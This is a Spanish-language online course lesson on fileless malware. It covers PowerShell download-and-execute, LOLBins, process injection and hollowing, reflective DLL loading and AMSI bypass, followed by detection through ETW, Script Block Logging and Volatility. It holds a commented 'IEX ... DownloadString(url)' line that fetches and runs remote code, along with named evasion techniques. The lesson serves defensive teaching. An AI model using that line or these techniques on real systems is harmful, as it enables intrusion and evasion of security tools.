Malware sin archivos y técnicas Living-in-Memory
Analice malware basado en PowerShell, inyección de procesos y ejecución en memoria que no deja artefactos en disco.
Malware sin archivos y técnicas Living-in-Memory es una lección gratuita de Cyber Security Academy en CoddyKit. Esta es la lección 2 de 4. Puedes leer la lección completa abajo gratuitamente — luego la practicas en el navegador con un editor de código integrado y un tutor de IA 24/7. Forma parte de la ruta de aprendizaje de Cyber Security Academy, y tu progreso se sincroniza en la web y la app de CoddyKit. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué es el malware fileless?
El malware fileless se ejecuta íntegramente en memoria sin escribir archivos ejecutables en el disco. Utiliza herramientas legítimas del sistema operativo, entornos de intérprete (PowerShell, WScript) e inyección en memoria para operar dejando unos artefactos forenses mínimos, que los antivirus tradicionales y el análisis basado en archivos detectan con dificultad.
Ataques basados en PowerShell
PowerShell permite patrones de descarga y ejecución: IEX (Invoke-Expression) descarga y ejecuta scripts directamente desde Internet sin tocar el disco. Las técnicas de ofuscación (sustitución de caracteres, base64 y concatenación de cadenas) evitan la detección basada en firmas del contenido malicioso de los scripts.
# Example obfuscation pattern (for awareness)
# IEX (New-Object Net.WebClient).DownloadString(url)
# Often base64-encoded to evade detectionBinarios Living-off-the-Land (LOLBins)
Los LOLBins son binarios legítimos de Windows que pueden utilizarse con fines maliciosos: certutil.exe (descargar archivos), mshta.exe (ejecutar scripts HTA), regsvr32.exe (ejecutar objetos COM remotos), wmic.exe (ejecutar comandos) y PowerShell (prácticamente cualquier acción). Vienen preinstalados, están firmados y a menudo figuran en listas de permitidos.
Técnicas de inyección de procesos
Inyección clásica: VirtualAllocEx → WriteProcessMemory → CreateRemoteThread. Process hollowing: iniciar un proceso legítimo suspendido, desasignar su código y reemplazarlo por código malicioso. Inyección de DLL mediante SetWindowsHookEx o AppInit_DLLs. Todas estas técnicas ejecutan código malicioso dentro de procesos de confianza.
Inyección reflectiva de DLL
La inyección reflectiva de DLL carga una DLL desde la memoria sin utilizar el cargador de Windows ni tocar el disco. La DLL contiene su propio mini-cargador, que resuelve las importaciones y se reubica. Meterpreter utiliza carga reflectiva, por lo que no deja ningún archivo DLL en el disco.
Process Hollowing (RunPE)
Process hollowing crea un proceso legítimo (svchost.exe) en estado suspendido, desasigna de la memoria su ejecutable original, asigna un ejecutable malicioso en el mismo espacio de direcciones y reanuda la ejecución. El proceso parece legítimo en el administrador de tareas, pero ejecuta código malicioso.
Técnicas de omisión de AMSI
Antimalware Scan Interface (AMSI) de Microsoft intercepta los scripts de PowerShell para que los analice el antivirus. Los atacantes evitan AMSI modificando en memoria AmsiScanBuffer() para que siempre devuelva un resultado limpio o mediante la ofuscación de scripts por debajo de los umbrales de detección de AMSI. La modificación de AMSI puede ser detectada por EDR.
Detección: análisis de comportamiento
El malware fileless se detecta mediante su comportamiento, no por la presencia de archivos: PowerShell estableciendo conexiones de red, procesos secundarios inesperados de aplicaciones de Office, regiones de memoria con permisos de ejecución pero sin un archivo asociado (malfind) y argumentos de línea de comandos de LOLBins que contienen contenido codificado.
Detección basada en ETW
Windows Event Tracing (ETW) proporciona telemetría detallada a las plataformas EDR: Script Block Logging captura el contenido descodificado de PowerShell, Module Logging registra las DLL cargadas, la creación de procesos con líneas de comandos completas y los eventos de conexiones de red. A los proveedores de ETW les resulta difícil desactivarlos al malware sin activar alertas.
Análisis forense de memoria para detectar malware fileless
malfind de Volatility identifica regiones de memoria ejecutables sospechosas. Las cadenas de texto de la memoria de los procesos pueden revelar URL de C2 o scripts incrustados. Process hollowing deja sin asignar la imagen del proceso original, lo que puede detectarse comparando el mapa de memoria del proceso con el ejecutable original del disco.
Registro de PowerShell y Constrained Language Mode
Active Script Block Logging de PowerShell (Event ID 4104) y Module Logging para capturar todo el contenido descodificado de los scripts. PowerShell Constrained Language Mode restringe las operaciones peligrosas. La lista de permitidos de aplicaciones de WDAC impide que se ejecuten combinaciones no aprobadas de LOLBins para ejecutar scripts maliciosos.
Comprobación de conocimientos
¿Qué hace que el malware fileless sea más difícil de detectar que el malware tradicional?
Resumen
El malware fileless abusa de PowerShell, los LOLBins y la inyección de procesos para ejecutarse íntegramente en memoria. Para defenderse de él se necesitan Script Block Logging, análisis de comportamiento de las plataformas EDR, aplicación de AMSI, listas de permitidos de aplicaciones y herramientas de análisis forense de memoria como Volatility para identificar código inyectado.
Preguntas frecuentes
¿La lección «Malware sin archivos y técnicas Living-in-Memory» es gratis?
Sí — el texto completo de «Malware sin archivos y técnicas Living-in-Memory» es gratis para leer aquí en la web. Para practicarla de forma interactiva (editor de código integrado y tutor de IA 24/7) y desbloquear el resto del curso de Cyber Security Academy, actualiza a CoddyKit PRO. El curso de Cyber Security Academy incluye 4 lecciones en total.
¿Qué aprenderé en «Malware sin archivos y técnicas Living-in-Memory»?
Analice malware basado en PowerShell, inyección de procesos y ejecución en memoria que no deja artefactos en disco. Practicas Cyber Security Academy con código real que ejecutas directamente en el navegador, y un tutor de IA 24/7 responde tus preguntas mientras trabajas en la lección.
¿Necesito experiencia previa para empezar Cyber Security Academy?
No se requiere experiencia previa. Cyber Security Academy en CoddyKit está estructurado para principiantes hasta estudiantes avanzados, así que puedes empezar aquí o desde el inicio y avanzar a tu ritmo. Esta es la lección 2 de 4.
¿Cuánto tiempo toma la lección «Malware sin archivos y técnicas Living-in-Memory»?
La mayoría de las lecciones de CoddyKit toman alrededor de 5–10 minutos. Cada una es compacta e interactiva, así que avanzas constantemente y retomas exactamente por donde dejaste en la web y la app.
¿Puedo escribir y ejecutar código en esta lección de Cyber Security Academy?
Sí. Cada lección de Cyber Security Academy incluye un editor de código integrado, así que escribes y ejecutas código real directamente en tu navegador y obtienes retroalimentación instantánea de IA — sin configuración local necesaria.
Todas las lecciones de este curso
- Ciclo de vida de una APT: del acceso inicial a la exfiltración
- Malware sin archivos y técnicas Living-in-Memory
- C2 sobre HTTPS y túneles DNS
- Atribución de amenazas y seguimiento de campañas